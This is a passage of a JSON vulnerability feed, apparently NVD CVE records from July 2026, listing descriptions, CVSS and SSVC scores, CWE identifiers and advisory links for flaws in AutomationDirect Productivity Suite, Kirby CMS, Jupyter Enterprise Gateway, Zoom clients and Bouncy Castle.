Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"ics-cert@hq.dhs.gov","type":"Secondary","description":[{"lang":"en","value":"CWE-125"}]}],"references":[{"url":"https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-197-04.json","source":"ics-cert@hq.dhs.gov"},{"url":"https://www.automationdirect.com/support/software-downloads","source":"ics-cert@hq.dhs.gov"},{"url":"https://www.cisa.gov/news-events/ics-advisories/icsa-26-197-04","source":"ics-cert@hq.dhs.gov"}]}},{"cve":{"id":"CVE-2026-60073","sourceIdentifier":"ics-cert@hq.dhs.gov","published":"2026-07-16T21:17:21.773","lastModified":"2026-07-17T18:31:44.140","vulnStatus":"Awaiting Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"An out-of-bounds read in the Productivity Suite allows a physical \nattacker to control the length of data sent to a USB device. This can \nlead to a system crash or disclosure of kernel memory."}],"affected":[{"source":"ics-cert@hq.dhs.gov","affectedData":[{"vendor":"AutomationDirect","product":"Productivity Suite","defaultStatus":"unaffected","versions":[{"version":"0","lessThanOrEqual":"v4.6.2.2","versionType":"custom","status":"affected"},{"version":"v4.7.0.47","status":"unaffected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"ics-cert@hq.dhs.gov","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:P/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":5.2,"baseSeverity":"MEDIUM","attackVector":"PHYSICAL","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"HIGH","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"ics-cert@hq.dhs.gov","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H","baseScore":5.9,"baseSeverity":"MEDIUM","attackVector":"PHYSICAL","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":0.7,"impactScore":5.2}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T13:15:13.008365Z","id":"CVE-2026-60073","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"ics-cert@hq.dhs.gov","type":"Secondary","description":[{"lang":"en","value":"CWE-125"}]}],"references":[{"url":"https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-197-04.json","source":"ics-cert@hq.dhs.gov"},{"url":"https://www.automationdirect.com/support/software-downloads","source":"ics-cert@hq.dhs.gov"},{"url":"https://www.cisa.gov/news-events/ics-advisories/icsa-26-197-04","source":"ics-cert@hq.dhs.gov"}]}},{"cve":{"id":"CVE-2026-61378","sourceIdentifier":"ics-cert@hq.dhs.gov","published":"2026-07-16T21:17:21.950","lastModified":"2026-07-17T18:31:44.140","vulnStatus":"Awaiting Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"A divide-by-zero vulnerability in the Productivity Suite allows a local \nattacker to cause a division by zero leading to a system crash."}],"affected":[{"source":"ics-cert@hq.dhs.gov","affectedData":[{"vendor":"AutomationDirect","product":"Productivity Suite","defaultStatus":"unaffected","versions":[{"version":"0","lessThanOrEqual":"v4.6.2.2","versionType":"custom","status":"affected"},{"version":"v4.7.0.47","status":"unaffected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"ics-cert@hq.dhs.gov","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":6.8,"baseSeverity":"MEDIUM","attackVector":"LOCAL","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"HIGH","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"ics-cert@hq.dhs.gov","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","baseScore":5.5,"baseSeverity":"MEDIUM","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":1.8,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T13:21:50.791725Z","id":"CVE-2026-61378","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"ics-cert@hq.dhs.gov","type":"Secondary","description":[{"lang":"en","value":"CWE-369"}]}],"references":[{"url":"https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-197-04.json","source":"ics-cert@hq.dhs.gov"},{"url":"https://www.automationdirect.com/support/software-downloads","source":"ics-cert@hq.dhs.gov"},{"url":"https://www.cisa.gov/news-events/ics-advisories/icsa-26-197-04","source":"ics-cert@hq.dhs.gov"}]}},{"cve":{"id":"CVE-2026-44175","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T22:17:01.833","lastModified":"2026-07-17T18:04:04.083","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Kirby is an open-source content management system. In versions prior to 4.9.1 and 5.4.1, Kirby did not securely sanitize the contents of the list field on save, leaving it vulnerable to cross-site scripting (XSS). Kirby's list field stores its formatted content as HTML, and unlike other field types, its HTML special characters cannot be escaped without losing the formatting. Sanitization was only enforced client-side in the Panel, while the server did not sanitize the content on save. As a result, an attacker could bypass the Panel and send malicious HTML directly to Kirby's API, storing unsanitized markup in the content file. That markup would then be rendered on the site frontend and executed in the browsers of site visitors and logged-in users browsing the site, resulting in persistent XSS. This issue has been fixed in versions 4.9.1 and 5.4.1."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"getkirby","product":"kirby","versions":[{"version":"< 4.9.1","status":"affected"},{"version":">= 5.0.0, < 5.4.1","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":8.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"PASSIVE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T13:11:19.443491Z","id":"CVE-2026-44175","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]}],"references":[{"url":"https://github.com/getkirby/kirby/releases/tag/5.4.1","source":"security-advisories@github.com"},{"url":"https://github.com/getkirby/kirby/security/advisories/GHSA-5fhx-9q32-q257","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-44176","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T22:17:01.967","lastModified":"2026-07-17T18:04:04.083","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Kirby is an open-source content management system. Versions prior to 4.9.1 and 5.4.1 do not check the `pages.access` permission  during page draft rendering. Permissions are defined for each user role in the user blueprint (site/blueprints/users/...). It is also possible to customize the permissions for each target model in the model blueprints (such as in site/blueprints/pages/...) using the options feature. The permissions and options together control the authorization of user actions. Kirby provides the pages.access and pages.list permissions (among others). The list permission controls whether affected models appear in lists throughout the Panel and REST API. The access permission has the same effect but also disables direct access to the affected models. This vulnerability affects the path resolver for the main CMS router. The resolver takes an input path from the requested URL and determines which model (page or file) should be rendered. When a path is requested that points to a page draft, the resolver checks that the request either contains a valid preview token or is authenticated by a valid user. In affected releases, Kirby allowed page drafts to be rendered if any valid user was authenticated, even if that user did not have access to the specific page model. Authenticated attackers with knowledge of the full path to an existing page draft could then access the rendered frontend page. This could lead to the disclosure of sensitive information, e.g. ahead of the launch of a new product or post. This issue has been fixed in versions 4.9.1 and 5.4.1."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"getkirby","product":"kirby","versions":[{"version":"< 4.9.1","status":"affected"},{"version":">= 5.0.0, < 5.4.1","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":6.0,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"PRESENT","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T11:10:56.143346Z","id":"CVE-2026-44176","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-862"}]}],"references":[{"url":"https://github.com/getkirby/kirby/releases/tag/5.4.1","source":"security-advisories@github.com"},{"url":"https://github.com/getkirby/kirby/security/advisories/GHSA-2xw4-v2wx-hqq9","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-44177","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T22:17:02.103","lastModified":"2026-07-17T18:04:04.083","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Kirby is an open-source content management system. In versions 5.3.0 and above but prior to 5.4.1, Kirby did not correctly validate the provided user ID, resulting in a path traversal vulnerability. Version 5.3.0 introduced a performance improvement to the Users collection that loaded user objects lazily when first needed. Users were queried by their ID, which was then used to locate the corresponding account directory under site/accounts. This affected the authentication API (accessible to unauthenticated requests), the users API (accessible only to authenticated users), and any other place that uses $users->find() to look up an individual user by a request-provided email or ID. As a result, an attacker could trigger arbitrary PHP file inclusion of files named  index.php (for example, the main PHP files of plugins), the impact of which depends on the logic those files contain. It also allowed probing for the existence of arbitrary directories on the server, letting attackers fingerprint the server and site setup, including installed plugins and the content structure. This issue has been fixed in version 5.4.1."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"getkirby","product":"kirby","versions":[{"version":">= 5.3.0, < 5.4.1","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":8.8,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"LOW","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T13:43:32.857508Z","id":"CVE-2026-44177","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-22"},{"lang":"en","value":"CWE-98"}]}],"references":[{"url":"https://github.com/getkirby/kirby/releases/tag/5.4.1","source":"security-advisories@github.com"},{"url":"https://github.com/getkirby/kirby/security/advisories/GHSA-9hx7-c53c-v6x8","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-44180","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T22:17:02.237","lastModified":"2026-07-17T18:35:23.877","vulnStatus":"Awaiting Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"Jupyter Enterprise Gateway launches remote Jupyter Notebook kernels across distributed clusters like Apache Spark, Kubernetes, and Docker Swarm. Versions 2.0.0rc1 and above prior to 3.3.0 have a prohibited UID and GID feature that by default prevents launching kernels with UID or GID 0 (root), and this restriction can be bypassed using a specially crafted KERNEL_UID or KERNEL_GID value. This input validation vulnerability allows running Jupyter kernels as root, which can be dangerous as it allows more attack surface, and may lead to container escapes, compromising the worker node and all workloads running on it. Repeated exploitation can compromise all worker nodes, and thus the entire Kubernetes cluster. It is possible to specify volume mounts, so one vector for a container escape is to use a hostPath R/W volume mount, use this UID/GID bypass to run as root, and then gain code execution in the underlying worker node by creating a crontab entry in the mounted host file system. This issue has been fixed in version 3.0.0."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"jupyter-server","product":"enterprise_gateway","versions":[{"version":">= 2.0.0rc1, < 3.3.0","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T14:20:43.912230Z","id":"CVE-2026-44180","options":[{"exploitation":"poc"},{"automatable":"yes"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-20"}]}],"references":[{"url":"https://github.com/jupyter-server/enterprise_gateway/releases/tag/v3.3.0","source":"security-advisories@github.com"},{"url":"https://github.com/jupyter-server/enterprise_gateway/security/advisories/GHSA-chq7-94j8-cj28","source":"security-advisories@github.com"},{"url":"https://github.com/jupyter-server/enterprise_gateway/security/advisories/GHSA-chq7-94j8-cj28","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}},{"cve":{"id":"CVE-2026-45334","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T22:17:02.550","lastModified":"2026-07-17T19:17:14.577","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Kirby is an open-source content management system. In versions prior to 4.9.1 and 5.4.1, the content-locking feature returned lock information without checking the requesting user's access permissions. Kirby's Panel includes a content-locking feature that records which user currently has a model open for editing. This lock prevents conflicting edits by multiple users and displays the locking user's identity in the Panel UI so other users know who to contact. Internally, the locking user's email address and identifier are included in every Panel view payload and in error responses returned when a user attempts to edit a model that is currently locked by another user. This allowed a low-privilege authenticated Panel user, whose role was configured with users.access: false or users.list: false, to learn the email address and identifier of any user who currently had a model open for editing in the Panel, including administrators and other higher-privilege users. Content locks are active for a configurable window (10 minutes by default). The email address can allow admin account enumeration, target phishing, and feed credential-stuffing attacks against the Kirby installation or other sites. The internal user ID can be cross-referenced with other endpoints once the requester has obtained a higher privilege through unrelated means. This issue has been fixed in versions 4.9.1 and 5.4.1."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"getkirby","product":"kirby","versions":[{"version":"< 4.9.1","status":"affected"},{"version":">= 5.0.0, < 5.4.1","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"LOW","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T16:47:38.073073Z","id":"CVE-2026-45334","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-862"}]}],"references":[{"url":"https://github.com/getkirby/kirby/releases/tag/5.4.1","source":"security-advisories@github.com"},{"url":"https://github.com/getkirby/kirby/security/advisories/GHSA-39vq-49qm-r2mc","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-53411","sourceIdentifier":"security@zoom.us","published":"2026-07-16T22:17:31.267","lastModified":"2026-07-17T18:08:08.140","vulnStatus":"Awaiting Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"A time-of-check to time-of-use (TOCTOU) race condition in the installation and uninstallation process of certain Zoom Clients for Windows could allow an authenticated local user to escalate privileges."}],"affected":[{"source":"security@zoom.us","affectedData":[{"vendor":"Zoom Communications","product":"Zoom Workplace VDI Plugin","defaultStatus":"unaffected","platforms":["Windows"],"versions":[{"version":"0","lessThan":"6.6.14","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@zoom.us","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","baseScore":7.8,"baseSeverity":"HIGH","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":1.8,"impactScore":5.9}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T13:19:11.633083Z","id":"CVE-2026-53411","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@zoom.us","type":"Secondary","description":[{"lang":"en","value":"CWE-20"}]}],"references":[{"url":"https://www.zoom.com/en/trust/security-bulletin/zsb-26013","source":"security@zoom.us"}]}},{"cve":{"id":"CVE-2026-53412","sourceIdentifier":"security@zoom.us","published":"2026-07-16T22:17:31.380","lastModified":"2026-07-17T18:08:08.140","vulnStatus":"Awaiting Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Input Validation in Zoom Desktop Client for Windows, Zoom VDI Client for Windows, and Zoom Meeting SDK for Windows may allow an unauthenticated user to conduct an account takeover via network access."}],"affected":[{"source":"security@zoom.us","affectedData":[{"vendor":"Zoom Communications","product":"Zoom Workplace for Windows","defaultStatus":"unaffected","platforms":["Windows"],"versions":[{"version":"0","lessThan":"7.0.0","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@zoom.us","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T13:18:39.757372Z","id":"CVE-2026-53412","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@zoom.us","type":"Secondary","description":[{"lang":"en","value":"CWE-20"}]}],"references":[{"url":"https://www.zoom.com/en/trust/security-bulletin/zsb-26014","source":"security@zoom.us"}]}},{"cve":{"id":"CVE-2026-15997","sourceIdentifier":"91579145-5d7b-4cc5-b925-a0262ff19630","published":"2026-07-16T23:16:15.727","lastModified":"2026-07-17T18:10:36.757","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Out-of-bounds write vulnerability in Legion of the Bouncy Castle Inc. BC-LTS bcprov-lts8on on ARM allows Overflow Buffers.\n\n This vulnerability is associated with program files https://github.Com/bcgit/bc-lts-java/blob/main/native_c/arm/sha/shake.C, https://github.Com/bcgit/bc-lts-java/blob/main/native_c/arm/sha/sha3.C.\n\n\n\nThis issue affects BC-LTS: from 2.73.0 before 2.73.12.1.\n\n\n\nIssue is only applicable if application involved is accepting memoable SHA3 / SHAKE states from potentially untrusted sources."}],"affected":[{"source":"91579145-5d7b-4cc5-b925-a0262ff19630","affectedData":[{"vendor":"Legion of the Bouncy Castle 